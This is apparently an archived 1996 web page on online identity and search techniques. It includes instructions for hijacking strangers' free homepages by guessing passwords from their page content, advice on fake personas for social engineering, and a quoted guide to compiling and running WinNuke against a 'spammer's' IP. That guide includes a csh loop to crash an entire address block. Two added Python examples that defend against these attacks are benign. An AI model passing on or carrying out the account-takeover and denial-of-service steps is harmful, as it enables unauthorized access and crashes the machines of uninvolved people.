Learn how to defend yourself
woodmann.com | Nov 12th 1996
Based on some private emailings from +ORC
"...these days, on the Web, you'll never be too careful, travel always through your cloak identities and with your applets killer on, keep your cache empty, watch out for cookies and do not bump too oft on wizard sites... Work well, +ORC"
The Web is immense and the chances are on our side. If you spent only a minute per page and devoted ten hours a day to it, it would take four and a half years to explore a million Web pages, and a lifetime to explore just a part of it. An automated search engine can do the same in two days, but in the same time quite a lot of these pages will have been changed, moved or migrated.
Once you have some identities (say three or four) remember that:
- Your Avatars' interests should be VERY different
- If possible the language you use should be different for each Avatar (if you know only English, use at least different language patterns, say university professor as A and lorry driver as B)
What's the point of having many identities?
You'll need the Avatars to practise some nice Web activities (offensive and defensive):
- enemy studying (see below)
- social engineering (if you need something or if you want to get more info about a target)
- intranet activities (see below)
- homepage high capering (see below)
For simple capering you do not even need a fake identity and you may practise it on many "easy" targets on the net. Capering is one of the best methods to conceal your identity; use the following approach:
- Find a free page provider with easy password validation scheme (say Angelfire, but also Geocities and Mygale can be used)
- Read many pages of people that are NOT computer experts and that do NOT update very oft (if ever)... you may be able to find the updating schedule on the free provider's pages.
- Let's say that the content of three such pages is the following: "Me and my dog Bertie", "This page is a tribute to my nice daughter Simona" and "I love lollypops".
- Try "capering" these pages using as passwords, respectively, Bertie, Simona and Lollypop.
You'll get, on average, one bingo out of 15 tries. Now you have some pages belonging to somebody else: do some of the following (mixing the points as need be):
1) Do not change the page, change only the password and leave it alone for a couple of months
and/or
2) Migrate immediately to another location
and/or
3) Change password
and/or
4) Use the email address of the page owner to get other free pages by other providers
and/or
5) Kill the page you capered
and/or
6) Repeat the same procedure twice
Now you'll have some "capered" pages that you can more safely (but not completely) use as
- "Depot" pages
- "Dormient" pages
- "Trap" (Luring) pages
For your own "intranet" (sort of, see below)
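Seen from the provider's side, capering works because the password is a word anyone can read off the public page. The following check is an added example (not part of the original page or of any provider's code) that rejects such passwords at signup or password change; the function names, the minimum word length and the letter/digit folding table are assumptions.

```python
import re
import unicodedata

MIN_TOKEN = 4  # assumption: shorter words ("my", "dog") are too common to flag
# assumption: undo the usual letter/digit swaps before comparing
LEET = str.maketrans("013457@$", "oieastas")

def fold(text):
    """Lower-case, strip accents and undo common character swaps."""
    text = unicodedata.normalize("NFKD", text)
    text = "".join(c for c in text if not unicodedata.combining(c))
    return text.lower().translate(LEET)

def page_tokens(page_text):
    """Words an outsider can read off the public page."""
    tokens = set()
    for word in re.findall(r"[^\W_]+", page_text):
        word = fold(word)
        if len(word) >= MIN_TOKEN:
            tokens.add(word)
            # crude singular, so "lollypops" also covers "lollypop"
            if word.endswith("s") and len(word) > MIN_TOKEN:
                tokens.add(word[:-1])
    return tokens

def guessable_from_page(password, page_text):
    """Return the page word the password is built on, or None."""
    core = re.sub(r"[\W_]+", "", fold(password))
    hits = [t for t in page_tokens(page_text) if t in core]
    return max(hits, key=lambda t: (len(t), t)) if hits else None

# Constructed sample: the three page titles used in the text above.
SAMPLES = [
    ("Me and my dog Bertie", "Bertie"),
    ("This page is a tribute to my nice daughter Simona", "$im0na96"),
    ("I love lollypops", "L0llyp0p!"),
    ("I love lollypops", "vQ7f-kx2p-Zm9d"),
]

if __name__ == "__main__":
    for page, pw in SAMPLES:
        print(f"{pw!r:18} -> {guessable_from_page(pw, page)}")
```

A provider would call guessable_from_page() with the current page content whenever a password is set, and refuse the password when it returns a word.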
You'll find a first approach on the ad hoc enemy page
a nice fine c program (Winnuke) by _eci... listing at the end of this section
How to use WinNuke to get rid of spammers

winnuke.c is a program which will crash any Windows 95/NT machine. Since this operating system is popular among spammers, winnuke makes it easy to get rid of them.

First, take the program code from the bottom of this post (everything after the ---Cut Here--- line) and save it to a text file called winnuke.c on your shell account or Linux box. Now compile it by typing:

    gcc winnuke.c -o winnuke

If you have SunOS, you may need to use this command instead:

    gcc winnuke.c -lsocket -lnsl -o winnuke

You should now have an executable program called winnuke in your directory. Now find the spammer's IP number. This is the first IP number in the mail headers which is not your mail server or mail relay. Once you have the spammer's IP number (eg 192.168.12.109) type:

    ./winnuke 192.168.12.109

except use the spammer's real IP number that you found. You should see something like the following:

    % ./winnuke 192.168.12.109
    Connected to [192.168.12.109:139].
    Sending crash... Done!
    %

Congratulations! You just nuked a spammer! Give yourself a pat on the back. You can ping the IP address to verify that it is actually down.

If it doesn't work...

Unfortunately a few spammers don't have just one IP address but a whole block (255 addresses). In this case you will need to nuke the entire block. To do this, use this script:

    #!/bin/csh
    @ number = 255
    loop:
    @ number = $number - 1
    ./winnuke 205.199.212.$number &
    #sleep 1
    if ($number > 1) then
    goto loop
    endif

Except you should use the first three bytes of the spammer's IP number instead of 205.199.212. If your net connection is too slow, uncomment the sleep command (line 6) and that will slow it down so it can get all the packets out.

That's it...
nice, isn't it?
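The csh loop in the quoted post leaves a recognisable trace on the receiving network: one source opening connections to tcp/139 on every address of a /24 within seconds. The following detector is an added example, not part of the original page; the record layout, thresholds and function names are assumptions, and the sample log is constructed.

```python
from collections import defaultdict

def find_port139_sweeps(records, min_hosts=16, window=60):
    """records: (epoch_seconds, src_ip, dst_ip, dst_port) tuples.

    Returns {(src_ip, dst_prefix): distinct_hosts} for every source that
    reached at least min_hosts different addresses of one /24 on tcp/139
    within window seconds. Thresholds are assumptions to tune per site.
    """
    per_pair = defaultdict(list)
    for ts, src, dst, port in records:
        if port == 139:
            prefix, _, host = dst.rpartition(".")
            per_pair[(src, prefix)].append((ts, host))

    alerts = {}
    for pair, hits in per_pair.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # slide the window so it never spans more than `window` seconds
            while hits[end][0] - hits[start][0] > window:
                start += 1
            hosts = {host for _, host in hits[start:end + 1]}
            if len(hosts) >= min_hosts:
                alerts[pair] = max(alerts.get(pair, 0), len(hosts))
    return alerts

def constructed_records():
    """Constructed connection log (documentation address ranges only)."""
    recs = []
    # one source walking 198.51.100.254 down to .1 on tcp/139 in ~5 seconds
    for i in range(254):
        recs.append((1000 + i // 50, "203.0.113.7", f"198.51.100.{254 - i}", 139))
    # ordinary file-sharing client: many sessions, but to a single server
    for i in range(30):
        recs.append((1000 + 10 * i, "192.0.2.10", "198.51.100.20", 139))
    # web crawler touching many hosts, but not on tcp/139
    for i in range(1, 100):
        recs.append((1000 + i, "192.0.2.99", f"198.51.100.{i}", 80))
    return recs

if __name__ == "__main__":
    for (src, prefix), n in find_port139_sweeps(constructed_records()).items():
        print(f"{src} reached {n} hosts in {prefix}.0/24 on tcp/139")
```

With the sleep line of the script enabled the sweep takes about four minutes, and a 60-second window still sees 61 distinct hosts, well above the threshold.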
You believe that searching the web is just using AltaVista, Hotbot and the other search engines? (Which you'll all find here btw).
You are wrong: there are (at least) three other possibilities:
1) Searching per email, see my lessons:
Fravia's own lessons
[Available lessons:]
lesson_5 ~ General use of agora, http:// retrieving ~ July 1996 ~ complete
lesson_6 ~ Ftping files, agora queries and emailing altavista ~ December 1996 ~ complete
lesson_7 ~ W3gate, search spiders, error messages and evaluation of results ~ March 1997 ~ complete
lesson_8 ~ Advanced searching techniques (combing and klebing) ~ November 1997 ~ complete
lesson_9 ~ Searching effectively ~ Site monitoring ~ January 1998 ~ complete
lesson_10 ~ Let the bots search for you ~ and build your own search-bots :-) ~ June 1998 ~ 'light'
2) Searching through own robots/spiders, you'll find material on this here.
3) Using the searches that OTHERS have made! (combing)
I divide this field into "usenet combing" and "topsites combing".
I started working on this in March 1997, and I don't think you'll find it somewhere else!
(c) Fravia :-)
Usenet combing is preferably made through simple email (never underestimate the POWER of email for internet investigating matters):
    To: Email-Queries@Reference.COM
    Subject: (None)
    Text: FIND search AND engines
Another possibility is through an Agora's "news:" command:
    To: agora@dna.affrc.go.jp
    Subject: (None)
    Text: send news:alt.anonymous
Topsites combing is very useful to find quickly "delicate" subjects, like warez and free "images". You don't do it obviously on newsgroups (where you'll always find only an infinite list of "me-too" lusers). You'll go instead, for instance straight to
Web-Counter
Where you'll have a look at the "Top 1000" pages
and Websidestory
The World Top 1000 Pages Where you'll have a look at the Top 1000 "hackers" page (for instance).
The same applies for the "normal" search engines and for many other "counters" on the web. As soon as you "see" a new counter somewhere, check immediately if there is a "top 1000" option, and wade happily through tons of information!
Enjoy!
(c) Fravia, 1995, 1996, 1997, 1998. All rights reserved, in the European Union and elsewhere
Original Page: http://www.woodmann.com/fravia/coumes.htm